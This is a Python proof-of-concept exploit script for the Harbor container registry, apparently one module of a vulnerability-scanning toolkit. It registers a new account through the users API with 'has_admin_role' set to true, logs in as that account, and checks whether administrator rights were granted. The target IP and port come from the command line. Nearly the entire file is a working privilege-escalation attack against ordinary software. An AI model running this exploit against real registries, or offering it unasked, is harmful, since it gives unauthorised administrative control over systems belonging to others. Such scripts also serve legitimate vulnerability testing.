#!/usr/bin/env python
#-*- coding: utf-8 -*-

import requests
import threading
import logging
import urllib
import re
import sys
import random
import argparse
from json_parse import Jsonparse



class harbor(object):
	def __init__(self,ip,port,level):
		self.ip = ip
		self.port = port
		self.level = level

	def run(self):
		string=''
		name = string.join(random.sample(['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j'], 6)).replace(" ", "")
		data = {"username": "","email":"","realname":"test","password":"Aa123456","comment":"test","has_admin_role": True}
		data["username"] = name
		data["email"] = name + "@qq.com"
		
		headers={"Content-Type": "application/json"}
		register_url = 'http://'+self.ip+':'+str(self.port)+"/api/users"
		try:
			r1 = requests.post(url = register_url, json=data, headers=headers, timeout = self.level, verify=False)
			print(r1.status_code)
			if r1.status_code == 201:
				s = requests.session()
				payload = {'principal': name, 'password': 'Aa123456'}
				login_url = 'http://'+ self.ip +':'+ str(self.port) + '/c/login'
				r2 = s.post(url = login_url,data = payload)
				print(r2.status_code)
				if r2.status_code == 200:
					api_url = 'http://'+ self.ip +':'+ str(self.port) + '/api/users/current'
					r3 = s.get(url = api_url)
					if '"has_admin_role": true' in r3.text:
						print('success')
						exit(233)
			else:
				print("The vulnerability does not exist on the website or the account name has been written")
				exit(1)

		except Exception as e:
			print(e)
			exit(-1)
		
		
if __name__ == '__main__':
	jsonfile = sys.argv[1] + '\\poc\\lib\\config.json'
	jsonobj = Jsonparse(jsonfile)
	jsondata = jsonobj.parse()
	targetip = sys.argv[2]
	timeout = jsondata['timeout2']
	port = sys.argv[3]
	obj = harbor(targetip, port, timeout)
	obj.run()